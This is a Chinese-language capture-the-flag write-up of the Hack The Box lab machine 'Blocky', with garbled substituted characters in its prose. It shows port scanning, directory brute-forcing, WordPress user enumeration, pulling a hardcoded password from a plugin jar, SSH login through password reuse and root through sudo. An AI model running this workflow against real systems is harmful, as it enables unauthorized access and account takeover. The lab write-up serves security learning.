乐趣区

关于渗透测试:HTBBlocky目录遍历漏洞敏感文件泄露

jiezi

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。

服务探测

┌──(root💀kali)-[~/htb/Blocky]
└─# nmap -sV -Pn 10.10.10.37 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-29 22:40 EST
Nmap scan report for 10.10.10.37
Host is up (0.34s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 696.03 seconds

开了 ftp,ssh,http 三个服务

80 端口关上是一个 wordpress 站点

ftp 端口貌似存在一个近程执行破绽

┌──(root💀kali)-[~/htb/Blocky]
└─# searchsploit ProFTPD 1.3.5
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                                                 | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                                                       | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                                                                                                                                                 | linux/remote/36742.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

把 36803.py 拷贝到当前目录,exp 要求一个可写 web 目录,咱们当初还不太分明哪里是可写的,须要提高一浸透 80 端口

爆破目录

└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.37                                                                         

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.37/_21-11-29_22-50-04.txt

Error Log: /root/dirsearch/logs/errors-21-11-29_22-50-04.log

Target: http://10.10.10.37/

[22:50:06] Starting:    
[22:51:25] 301 -    0B  - /index.php  ->  http://10.10.10.37/               
[22:51:29] 301 -  315B  - /javascript  ->  http://10.10.10.37/javascript/   
[22:51:32] 200 -   19KB - /license.txt                                      
[22:51:46] 200 -   13KB - /phpmyadmin/doc/html/index.html                   
[22:51:47] 301 -  315B  - /phpmyadmin  ->  http://10.10.10.37/phpmyadmin/   
[22:51:48] 200 -   10KB - /phpmyadmin/                                      
[22:51:48] 301 -  312B  - /plugins  ->  http://10.10.10.37/plugins/         
[22:51:48] 200 -  745B  - /plugins/                                         
[22:51:49] 200 -   10KB - /phpmyadmin/index.php                             
[22:51:51] 200 -    7KB - /readme.html                                                                    
[22:52:11] 200 -  380B  - /wiki/                                            
[22:52:11] 301 -  309B  - /wiki  ->  http://10.10.10.37/wiki/
[22:52:11] 301 -  313B  - /wp-admin  ->  http://10.10.10.37/wp-admin/       
[22:52:11] 200 -    1B  - /wp-admin/admin-ajax.php                          
[22:52:11] 200 -    1KB - /wp-admin/install.php                             
[22:52:11] 500 -    4KB - /wp-admin/setup-config.php                        
[22:52:11] 200 -    0B  - /wp-config.php                                    
[22:52:12] 200 -    0B  - /wp-content/                                      
[22:52:12] 301 -  315B  - /wp-content  ->  http://10.10.10.37/wp-content/   
[22:52:12] 500 -    0B  - /wp-content/plugins/hello.php
[22:52:12] 200 -   69B  - /wp-content/plugins/akismet/akismet.php           
[22:52:12] 200 -    0B  - /wp-cron.php                                      
[22:52:12] 301 -  316B  - /wp-includes  ->  http://10.10.10.37/wp-includes/ 
[22:52:12] 200 -  965B  - /wp-content/uploads/                              
[22:52:12] 500 -    0B  - /wp-includes/rss-functions.php                    
[22:52:12] 200 -    2KB - /wp-login.php                                     
[22:52:12] 302 -    0B  - /wp-signup.php  ->  http://10.10.10.37/wp-login.php?action=register
[22:52:12] 405 -   42B  - /xmlrpc.php                                       
[22:52:13] 200 -   40KB - /wp-includes/

好几个文件夹存在目录遍历破绽。

用 wpsscan 枚举用户名

wpscan –url http://10.10.10.37 –enumerate u1-200

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:17 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:00:17

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

存在一个叫 notch 的用户

用这个用户名爆破 wp 后盾,ftp,ssh,phpmyadmin 无果 …

初始 shell

如同走入了死胡同。

于是只好在爆破的目录里看看有什么有用的货色,在 /plugins/ 目录里找到两个能够下载的 jar 文件

BlockyCore.classBlockyCore.jar里分离出来,用 strings 命令查看

┌──(root💀kali)-[~/htb/Blocky]
└─# strings BlockyCore.class 
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
        localhost
root
8YsqfCTnvxAUeduzjNSXe22
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java

如同有一个用户凭证:root:8YsqfCTnvxAUeduzjNSXe22

然而用来登录 ssh 和 ftp 都不行

而后再用下面的用户名 notch 登录,竟然登进去了,于是找到咱们的初始 shell

┌──(root💀kali)-[~/htb/Blocky]
└─# ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$

在 home 目录找到 user.txt

提权

查看 sudo 特权

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

能够应用所有 root 权限命令。。。

那就很简略了,间接提权到 root

notch@Blocky:~$ sudo bash -p
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# whoami
root
退出移动版